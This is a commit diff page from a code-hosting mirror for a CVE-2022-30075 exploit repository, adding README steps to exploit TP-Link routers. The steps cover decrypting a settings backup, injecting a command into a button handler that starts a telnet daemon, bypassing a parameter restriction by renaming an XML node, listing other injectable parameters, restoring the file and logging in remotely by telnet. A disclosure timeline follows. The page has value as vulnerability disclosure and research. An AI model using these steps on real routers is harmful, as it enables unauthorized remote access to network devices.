crash.software
Projects
Pull Requests
Issues
Builds
CVE-2022-30075
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY CVE-2022-30075 Commits 46f74dae
🤬
  • ■ ■ ■ ■ ■ ■
    README.md
    skipped 10 lines
    11 11  Using exploit for starting telnet daemon on the router
    12 12  ![tplink](https://user-images.githubusercontent.com/28111712/172499966-8a5d486f-c79d-4fe2-95ff-de77d211ab54.png)
    13 13   
     14 +### Manual Exploitation
     15 +1. login to router web interface
     16 +2. go to advanced -> system -> backup settings
     17 +3. decrypt and decompress backup file
     18 +- if your router uses different format of backup files you can modify exploit code (class BackupParser) or simply use some tool from github:
     19 +https://github.com/stdnoerr/tp_link_credentials_harvester/blob/master/decrypt.py
     20 +https://github.com/ret5et/tplink_backup_decrypt_2022.bin
     21 +...
     22 +4. in decrypted xml file you can find something like this:
     23 +```xml
     24 +<button name="led_switch">
     25 + <action>pressed</action>
     26 + <button>ledswitch</button>
     27 + <handler>/lib/led_switch</handler>
     28 +</button>
     29 +```
     30 +- replace it with these lines
     31 +```xml
     32 +<button name="exploit">
     33 + <action>pressed</action>
     34 + <button>ledswitch</button>
     35 + <handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
     36 +</button>
     37 +```
     38 +- there is a restriction that blocks modification of parameter `system.button.handler`, but it can be easily bypassed by changing name of parent xml node (e.g. `name="exploit"`)
     39 +- code execution can be achieved not only by changing parameter `system.button.handler`, but also using `ddns.service.ip_script`, `firewall.include.path`, `uhttpd.main`, and others...
     40 +5. compress and encrypt modified backup file
     41 +6. go to advanced -> system -> restore settings -> upload modified backup file
     42 +7. after reboot, push the led button that triggers execution of injected command `/usr/sbin/telnetd -l /bin/login.sh`
     43 +8. remotelly login to router: `telnet 192.168.1.1`
     44 + 
    14 45  ### Timeline
    15 46  15.03.2022 - Identified vulnerability
    16 47  15.03.2022 - Contacted Tp-Link support
    skipped 5 lines
Please wait...
Page is in error, reload to recover